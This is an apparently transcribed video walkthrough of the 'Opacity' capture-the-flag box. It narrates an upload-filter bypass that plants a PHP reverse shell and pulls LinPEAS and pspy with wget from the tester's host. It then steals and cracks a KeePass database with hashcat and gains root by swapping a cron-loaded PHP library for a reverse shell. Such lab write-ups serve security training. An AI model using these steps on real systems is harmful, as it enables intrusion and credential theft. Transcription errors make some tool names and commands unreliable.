Welcome to Sabretooth at Nethemba, where we care about your security. Now, generally, I only really do easy and medium boxes when I've been given a challenge, but I thought in this case it's 8 p.m. Just want something a bit easier to finish the weekend, Sunday evening. So, we're going to set the difficulty to easy, and we're going to look for, I don't know, I'm just going to put my hand on the keyboard and just okay, operating system security. Oh, it's an introduction room. Securing open source dependencies. Opacity is a boot to root made for pen tests and cyber security. Okay, let's try that one. So we've got Opacity. Fine. Not sure about this one, but we will see. This one wasn't a recommendation, and it also wasn't a challenge or anything like that. So we're going to make a new directory, which is boxes, opacity, and then we're going to go into that directory. And to be fair, I could actually just close some of these off and open a few of these, right? Makes a lot of sense. Okay, so already I'm stopping. I'll be back in just a second. Just need to get a drink. Okay, we are back. So let's join the room and let us start the machine. And there's not really much else to do. Oh, except for get rid of that and get rid of that. Check that this is the same as usual, which it is. Not looking at anything down here unless there is a, in case there's a hint. But this I'll read. It's an easy machine, good, which can help you in the penetration testing learning process. That's it, I'm screwed, guys. There are two hash keys located on the machine, local.txt and rootproof.txt. That's different. Can you find them and become roots? There are several ways to perform an action. Always analyze the behavior of the application. Yes. Okay, 12 seconds. Cheers. Oh, sharp. Okay, we have the IP. We're going to immediately nmap. We're also going to throw this into here. We could also do an opacity. Oh, it's down at the minute, is it? Let's try again. Might take a while to start up. We'll do that as well. So sudo nano etc. Do you know what? I know I will do it this way, but in future I'm just going to start like echoing it and pushing it into the file. But for now I'll just do it this way because it's just easy enough. It doesn't take long. It's not like I've got anything on. It's time to kill right now. Obviously, we're checking the website because we can. I did spell it right, didn't I? Yeah. That's weird. That's still down. What is going on? It's already been 3 minutes since it's not up. So it says try capital P and to block the ping in case the system's blocking the ping probes. So we'll try that, of course. How unusual. How very unusual. fine. We can't get the... we can't connect to the web either. It keeps going to HTTPS, so that's really interesting. I wonder if this box is actually okay or if there's something wrong with it. Or maybe this time there's no website, which is a little bit worrying. That works. Okay. Right, in that case, well, something's wrong. That is the correct IP address, though. Try it again without the... It's working this time. It must just take a while to start up, you know. So we have a login page on the web here. Fine. Yeah, it's working this time. Okay. Wonder what's going on. Right, so we've got a login page. We can try admin password. We can try some SQL injection. Try robots.txt. And I guess we could run Derb or GoBuster or something. I like using Derb, but GoBuster is so much quicker. So maybe I should do that instead, actually. Or I could do both. I could do both. Do I need Dirt and Ghostbuster? Ghostbusters, yeah. GoBuster, is that the... Yeah, it is. URL is this, and word list is tools, word list, derb, common.txt, right? So it's got the CSS file, but that's going to be fairly useless. And this one's got it as well. See how quick that is compared? Look, ridiculous. So what I'll do is go fast track. Fine. I'll go into the sec lists, which I'd like to do. I will do one of the directory discovery, and then one of the directory ones, right? Or is it web stuff first, isn't it? Web content. Directory list, I think it's 2.3 lowercase or something like that. No, it's not. We've got small.txt, right? I'll try that. Try to remember as much as I can. One thing I can do is reload this and check the source code. Sometimes quite useful. There's that CSS directory. We've got username, password. Do I need to brute force this with Hydra is the question. Oh, we've got a cloud directory here. Let's check that out as well. Let's check that out. Oh, we've got an upload. Nice. This is good. So we've got an upload field here. Cool. Right. So, do you know what? I'm actually literally just going to put the whole command rather than saying GoBuster shows, because I need to know exactly what I've actually done here. What's this end map doing? Ugh. It's going to take ages. Anyway, we're working on this. So, cloud shows an upload form. If I can upload a PHP file, obviously that's good because it says images. I'll tell you what, let's save this image as so it's folder.ping. external URL. Oh, it's a web address. I see. So if I copy the, if I open it in a new tab, I should be able to just copy the URL and put it in there. Upload image. And that's the image that I've uploaded. I get it. So it's showed straight away. It's displayed straight away. Got it. Right. So obviously the best thing to do at this point would be to cd into shells. I'll try c99.php. You see I've already got like an image thing here. I must have done this like before at some point. Not this box, but this thing. But I'll do it from scratch. I'll use c99, see if that works actually. So we're going to go sudo python 3 module http server on port 80, which means that now we can do http. That's not what I want. That's what I've just done a second ago. 10.14. Let me get this right. I always get this the wrong way around. 102.67. Can you choose a better font, guys? 67/c99.php. Please select an image. Okay, so that wasn't an image. Got it. So it's not even making the connection because it wants an image file. So I will do what I did last time, but rather than, do you know what, let's do it through Burp Suite, because that way I don't need to make any new files. I don't want to start having image versions of shells everywhere. That's a nightmare to deal with when tidying up. Okay, that's still going. That didn't find anything useful. That only found CSS and cloud. Come on, Burp Suite, hurry up. It'd be easier if we just like try this. No, we'll do it this way. We'll do it this way because then I can edit and play around with the file without having to rename files all the time, if that makes sense. You'll see. So I'm going to set this to use, I've already done that, to use Burp Suite. Okay. I need to set Burp Suite to intercept. In theory, come on, hurry up. Burp is so resource heavy, it's unreal. This is an old laptop that I'm using, and I'm talking ancient, right? So, so we're going to proxy and intercept, and then we're going to do this again. No, of course I don't. It's ridiculous. So for some reason that's not working now. Why not? There we go, it's more like it. Send that to the repeater and we'll let that go. So if we do this, we can see the response, which says, please select an image. Okay, so there's our web address, http://1040.127/16.99.php. I'm going to put a question mark .jpg because that's a oh come on, that's a parameter thing, like where the variables go this side. For example, like if you go to google.com and then it goes like index.php question mark v equals whatever, So yeah, your parameters come after this, but if it sees JPG, that might be enough to make it think it's an image. So we'll do that. Transferring file. So that actually says transferring file. That's interesting. Okay, so if that works, and it's actually grabbed the image from... Interesting, okay. So what I'll do then is... .jpg transferring file. So that's my broken file. I will open it in the new tab. It says it's not found, but if we get rid of that, still not found. Interesting. I thought that would have worked. Huh. I thought that would have worked. Okay, so that's not the way to do this. So what I'll try instead is, instead of that, I'm going to put in what's known as a null byte. So what's going to happen is the program's going to see that it ends in .jpg and thinks an image, but when it's processed, the null byte kills everything from there onwards. So that's the file name, and it ends in .php. So let's try that. I'm not sure whether that would be... worth a try. Let's have a look. No, that just says upload image. That didn't work. Okay, so we'll try 0a, which is like a new line. So what's going to happen is when it reads this, it's going to do that, and it'll just have c99.php, but it'll still see it as an image. So we'll do a new line filter, see if that works. Transferring file, that one works. Okay, let's try that. So what we'll do actually, we're just going to intercept again. I don't know why I did that. Let that go. Come on. Intercept. And then we're going to put in c99.php.jpg or something. But we're going to change that to oa.jpg and let that one go. Again, we've got a broken file. We're going to open it in the new tab, get rid of the .jpg because that's been moved on to a new line. Okay, now we've got a 500 server error, and then it's removed. That one might have worked. I think what I probably need to do is use a PHP reverse shell instead, because you see what I mean, it didn't even add the 0a or whatever here. So let's use the PHP reverse shell instead, which I know runs on port 1234. So let's do nclvp1234. This may be the way forward. We're going to paste that in. Hang on, I need the full web address here. We'll just send this. We'll just send this. I know that's a bit counterproductive, or it seems it, but we'll just send this. And then we're going to replace c99.php with this. We're going to do the same. And then .jpg. And hopefully this time, when it loads, will it give us a connection? It won't. Opening new tab. No response received from server. Fun times. Then we'll get rid of .jpg. Okay, so that doesn't work either. This is quite an interesting filter. I'll tell you what I could have done. I can also use OD and 10. It's not actually 10, but 1 0. I'll try both of those. They're very well known, like bypass. Come on, it's too late for this. They're very well known bypass things. So we will try 10.jpg. And we'll try 0D as well, because one of them, 0D and 0A, one of them's a line feed and one of them's a carriage return. Again, it's not found, and neither is that. Okay. So rather than guessing, oh no, that won't work. That won't work. Okay, I am going to have to keep guessing, I'm afraid. I was going to put it into Burps Intruder, but it's not that simple. Really not that simple. Okay, let's try 0D. Try 0B as well. Something is removing my attempts as well. Let me be back in a second. Toilet time. Back. I've just looked over the video because I noticed that one of these gave 500 code error and the rest all says 404 not found, right? So I was wondering which one gave 500 so I could try it again without having to try them all again. And it was 0A, and I had a feeling that would work. So I just kind of wonder, whether I can put it in here to be fair. 0a.jpg, maybe I can't, but if I do that, yeah, I mean, I'm playing with Burp, but it just says it's not found though. I thought that was the one which said, whatever's happening, something is removing. What if then I do this c99.php and upload it like that, and then it's literally just been. Let's try it again. Upload it here. Reload this page. Yes. So it does exist, and then you load it again, load it again, load it again, again. Keep loading it until eventually it's removed. Okay, it's staying up for quite a while this time. Unless I've broken the site. Right, okay, let's change this to PHP reverse shell.php. So if I take this file, I upload it here, and then I look for it here. Okay, so I just got unlucky. It was removed as I was trying to use it. And obviously C99 won't load at all. We've got a reverse shell. That's crazy. Yeah, I just had to look back through what I've just done and see. I should be making notes on what works and what doesn't, and what results I'm getting. But there we have it. I mean, we're quite far. We're nearly half an hour. We've only just got a shell. I know it's meant to be a 2-hour system, but regardless. Okay, right. This only allows image files, so we can use a to bypass the filter. Okay. Okay. We can get into the sysadmins directory, but we do not have rights to read local.txt. That's ridiculous. Okay. Fine. This is owned by root, but we've got rights to... Do we have rights to go in there? Okay, we've got rights for this script. Permission denied. Okay, we have rights to read some of these scripts. Interesting. I wonder how this port scan's doing, by the way. Oh, we've got a few more ports open. We've got Samba here. Could be useful. But we're already on the system, so maybe it's not useful. Fine. Where to from here? Permission denied. Okay, so if we go into the temporary directory, we've got rights here. I didn't check that Ubuntu folder, did I? Nothing in there. Okay, I just went straight into opt because I remember a couple of systems straight away. That's where they hide things. So finding multiple nodes, opt. Unexpected and opt usually empty. That was on internal. And then we've got opt here, and that's on Jack. So we've got two systems with something in opt, and I just immediately went there. So blind bit of luck that there's something in here. But let's do this properly. If I didn't know that that's the way things are generally done here, I would get limpies. We know how this works, right? And it would tell me that. But we'll do it just because. We'll do it just because. So we're going to... No, it's just a blind bit of luck. wget http 10.14 102.67/limpies.sh. Change the mode. And it will tell me exactly what I've just said in a minute. It will say that there is something in opt which is normally empty. I don't know. I mean, it is an easy box. It is classed as easy, so what do you expect? And then again, I had a bit of trouble getting in with the... I did get it right. It was just removed. So we've got some exploits here. What else do we have? Right, okay. Timers. Listeners. I've got a feeling there's a cron job running as well, because scheduled task, because my files kept getting removed in the when I was uploading. That might be what's in that scripts directory, to be fair. Cached hashes, cloud configurations, keyrings, storage.php. That's interesting. Analyzing keypass files. Ops dataset.kdbx. So it's found it once there. It will find it again down here somewhere. Unexpected in ops, usually empty. So I'd have seen it there anyway. Okay. We've got a backup.zip as well. Could be useful. In the last 5 minutes, something's backing something up. That's interesting. We'll start with the KeyPass file, because I use KeyPass myself and I know exactly how to deal with this. And then we'll come back to that other one, backups. Limpy's shows, although we found it without. So we need to get this file. I'll tell you what I could do. Can I copy that? Right, I can copy it to temp. And if I can copy it to temp, I could also copy it to the website. Never do this, guys, because you are exposing your KeyPass file. I'll explain what KeyPass is for those who don't know in a second. We're going to put that in var www HTML. Oh, come on. So now, if you go onto the website, we should be able to download this like this. Okay, so just so we get a decent run at this, we are going to wget this and put it here, and there we have it. So KDBX is a database file. Oh, that aches. For KeyPass, which is a password manager. If I open up KeyPass, you'll see here that it will load up my database, my personal one. And I'd put in the master password and all my passwords would be in there. Okay, I don't mind using password managers like this because they're offline only, meaning that no service is getting hold of my passwords or anything like that. It's literally just stored on my system, but it's in this KDBX file. Now, they are encrypted. So what I'm going to do is run Python, tools, KeyPass to John, Yeah, so it's asking for the KDBX files, right? So what I'm going to do is give it the data set.kdbx, and that is the hash which John can crack. So all I'm going to do is redirect that into hash.text. And it says it should be removed, including the colon. So we will do that now. Kill that. And although John can crack it, Hashcat can also crack it, right? So let's do this. So I'm going to run Hashcat just with the help. And it's important that you do this because you need to find the right mode to crack it in. It has different modes for different file types. So if I look for KeyPass, that's going to take too long. So I'm going to run it again, and this time I'm going to grep, i.e. search for KeyPass. Oh, it's not actually found it. Maybe capital K. Ah, there we go, KeyPass. So KeyPass 1 and KeyPass 2, password manager, KeyPass 1 and KeyPass 2, key file only mode. I don't know what that means. But anyway, we've got 13,400 and 29,700. So that's the important thing, right? So I've not updated my notes. We move this to var www.html and run KeyPass to John Python script to store the hash in hash.text. Right, that's fine. I don't need to basically write down all my commands. I know what I'm doing at this point. So I'm going to run that. I'll do that as well. 13,400 looks about right. So now we can run Hashcat again. We have run Hashcat before. Generally we use John the Ripper, but Hashcat's quicker. Let's see if we can find out where we've done it before. It was in Overpass. So we can actually just take this. We can just take this, I guess. So we can do hashcat hash.text rocku pot file disable, but we also need to give it the m, which is mode 13,400, so it knows the type of hash that it's trying to crack. I think that probably would be okay. I may be wrong. There we go. It's running with rocku. Nice. So let's just see what it says here. Hashes digest, one unique digest, one unique salt. Okay. Initializing backend runtime for device 1. Please be patient. This might take a while. I wonder if John will be quicker. No password hash is loaded. Yeah, I need to find a way to tell it what hash to do, and I can't be bothered to figure that out for John as well. It's bad enough figuring it out for Hashcat. So if there's any way to quicken this up, I think once, although rocku is a huge list, maybe I shouldn't use that. I've always said use the shorter list first. Maybe that's why it's taking a while, if it's got like a massive word list. Yeah, rocku is huge. I didn't even realize I'd running rocku until I just read my pasted command. Well, we'll start it and then we can run it again, I suppose, with something smaller. If I just want to make sure that it's working more than anything. Hashcat's an awkward one. I've already just done that. Okay, fine. Fine. Running yet? Shall we copy that and see if there's a way to speed it up? It seems that I'm not the only person. It seems that I'm not the only person with this problem. Come on. Reddit's got the answer for everything, quite honestly. It's even got a subreddit called hash cracking. That's ridiculous. Come on, comments, where are you? Yes, no, maybe. How weird. Oh, that's still running as well. My laptop's basically dying due to this. Try installing the CUDA toolkit. Three or 4 hours to go through RockU. Wow. Oh no, passphrase.txt and RockU took a few seconds. A mask attack. Yeah, that's true. Oh no, hang on. What we got? What we got? What's just happened? Oh, it's cracked it. Oh, there we go. Just be patient, guys. Just be patient. It has cracked it, and the password is 741852963. Okay. Good. That didn't take as long as it could have done. We'll get in there. We'll get in there. So we will. It took 4 minutes ish, give or take. Nice. So we can now load up this KeyPass file with this password. People are so noisy. Boxes. Opacity. Load that up. Put in the master password, which we just cracked. And then we've got user, password, sysadmin. And then we can go to edit entry and show password. That's huge. That's a good password. Right, so we're going to screenshot this just to make it a bit easier. Put that in here. SSH, I guess. SSH, I guess, right? Go away. How do I select? Oh no. How do I use KeyPass? I'm an idiot. Of course I know. So SSH sysadmin at opacity.thm. I've obviously done something wrong with. Oh, it's a comma. That's why. That's better. And then the password, I can right click, copy password. Gives you 12 seconds to paste it in. Nice and secure, and then it's removed from your clipboard, you see. Brilliant. Right, we've got our first flag, so we're actually officially now started. That must have been an hour already, at least. And I've only been 47 minutes. Okay, well, we have the password for this user. So let's try sudo l. And the password, oh, I'm going to need to copy it again. User sysadmin may not run sudo, so that's no good. I was hoping for an easy win there. Anyway, we can check what's in these script directories. So we cat scripts.php, require once lib backup inc.php. So it's taking scripts backup. It's just making a backup of the script directory. Okay, right, I see. As sysadmin, we can execute and read, but we cannot. Oh, that's the lib here. Here we can just read it. Oh, the root can write it. We can't overwrite script, but script uses lib backup.inc. I wonder if I can edit that one. Huh. I'll tell you what I could do though. We could wget, hang on, wget 10, 14, 102, 67 ps pi. And then ps. So we can see what is actually running, because there is something, it's deleting our files that we're uploading. So we're 10 seconds to the minute, assuming it runs every minute or every 2 minutes like it generally does. We should hope to see something in a few seconds. I was wrong. I thought something was going to work then. I guess if it's every 5 minutes, or oh no, there is something here. Okay, so aha, so it's running sysadmin script.php. So it is running this script.php, which we can't edit. Okay, well, let's take a copy of that. I can try to. It won't work though. It's unwritable. I can't remove it, can I? No. So if we cat the script again, we can see that it uses libbackup.inc.php. Can we overwrite that file is the question. Okay, so script .php is not writable, and we cannot remove it. How about file schedule removal? Yeah, exactly. How about this one? Nope, wrong one. Because it's zipping everything in scripts into there. So how about the one which it requires? This one here. Okay, so we will do lsl lib again we can only read, and root can write it, so I can't even read that. This is really quite interesting, you know. So we will look at that file anyway, I think, and just see what's in it. Oh god. Echo, hang on. we try echoing into this script and we don't have permission. We try removing this script. Oh, that worked. What? Oh. Okay, we cannot edit this, but we can remove it. So the reason why I didn't see that before is because it wasn't the permission of that script which I needed to look at. It was the permission of lib. We've got full read, write, and execute permissions for everything in this directory. So although we couldn't edit that file specifically, which had different permissions, because it was in the lib directory, we could absolutely we could absolutely remove things from it. So if we echo moo into here, we can recreate the file. We didn't have permission to overwrite the original. We need to create the file first. Huh. Oh, it's because I'm already in lib. I'm an idiot. I'm already in lib. That's fine. So we can echo moo into backup inc.php. Good. So we can create this PHP file. If we try and edit it now, we can, because we've got rights over it now. Okay, from here we are looking, we are pretty simple from here. It's going to be very, very easy from here. All we need to do is cat out the PHP reverse. That's not here, that's shells. What we can do is copy this, but we need to change probably change the port, because I think we're already using, oh no, we're on SSH. We're in SSH, so that's fine actually. That's really good. We'll just paste that in. 1234 is our port of choice. Yeah, absolutely. Save that. Hang on before I do that. And of course, this is run as admin, isn't it? I think we just wait. So after a while, scripts, the script.php is run, which in turn calls libbackup.php, which we've now recreated, removed and recreated with a reverse shell. It's just waiting for this all to be run and be chained together at this point. I'm hoping so anyway. Running PSPy again. Oh, there we go. I've got it. It came in. It definitely came in. So I'll actually kill that. And I'll run it one more time. And we'll just wait for it to come in so you can actually see it happen. Because you can see that this is actually running. It's just a case of waiting, and then I'll get the root flag. I should have got the root flag first. But hey, cheers. We made it. I'm not sure if this runs every minute. Every 2 minutes. What do I think of this box? I quite like the bypass to get the file uploaded. However, I'm a bit annoyed that I did it just as my file was being removed or something like that, which is a bit ridiculous. So if some of these scripts run, I think that's what happens anyway. But something wasn't working right, but it is now. It's fine. I just had to watch that back and see what happened. And then this was fine. It was a shame that I found the KeyPass file manually just from guessing. Generally, you need to be a little bit more thorough than that, but I kind of know how some of these easier boxes work now. We've got 10 seconds. 8, 7, 6, 5, 4, 3, 2, 1. Shell. Okay, fine. I thought that was going to be it. If it runs every 5 minutes, I've just basically wasted 5 minutes, but whatever. I'm just talking through the box. So yeah, I truly think that... I lost my train of thought. Yeah, that was okay doing the upload. I didn't like finding that in Opt, but I'd have just run Limpies and found it anyway, so it doesn't really matter. The KeyPass cracking was simple enough with RockU. It took a while to initialize. But I think that... So I'm losing my train of thought. I'm really tired tonight. Yeah, it's an easy enough password. Using KeyPass is easy enough. Of course, you'd have to install KeyPass if you've not used it before. Let's see if this one works. 5, 4, 3, 2, 1. So it's not even every 3 minutes. It must be every 5 minutes. Other than that, not much to say. I mean, it was quite interesting having the main script not editable and not removable. But it called on one which was editable. There we go. There's our shell right here. And it says that we're root, so we don't even need to do a who am I, but we shall just for completeness. So we're going to ls the root proof.txt cat. Yeah, root slash. On the whole, I can see why it's an easy box. I would say it was easy. I did get a little bit tripped up. I did get a little bit tripped up on the image filters just because of this, that, and the other, but it didn't take too long. Even with waiting that extra 5 minutes, we're still done in an hour. So there we go. That's great. I will terminate this machine. So there we go. Did it within the hour. And now it's just a case of putting in, please let me have written these down. Oh, one of them I put here, didn't I? Oh, I didn't. I thought I did. That's going to be really annoying if I didn't get that. Must have done. Come on, where are you? There we go. Went past it twice. I knew it'd be somewhere. Please be right. I don't want to have to do this again because of a typo. Yeah, simple enough. Simple enough. Did it in half the time. And that was even with a bit of a hiccup in the middle. But there we have it. We can get back to here. Am I level 4 yet? Am I level 4 yet? Is the next question. Let's find out. I am halfway through level 4, to be fair. To be 4. So yeah, I'm obviously going to reach level 15, but not yet. Because if I wanted to just sort of go through this site and just spend, what, 5 hours a day on it or something like that, I'd be done. I'd get, I'd push through it quite quickly. But The way I'm doing it at the minute is literally I'm just doing it whenever I record, and I'm not got the energy to record for 5 hours a day. So literally I'm just doing one box every few days, and I will eventually reach level like 15 down here, but it's not even 15, is it? It's more than that, because that's 9, 10, 11, 12, 13, 14, 15, of course, 16, 17, 18, 19, 20, 22 or something like that. But regardless, we're doing okay. We're doing okay. Thank you for joining, and be sure to visit nethemba.com for all your pen testing needs. Thank you, and goodbye.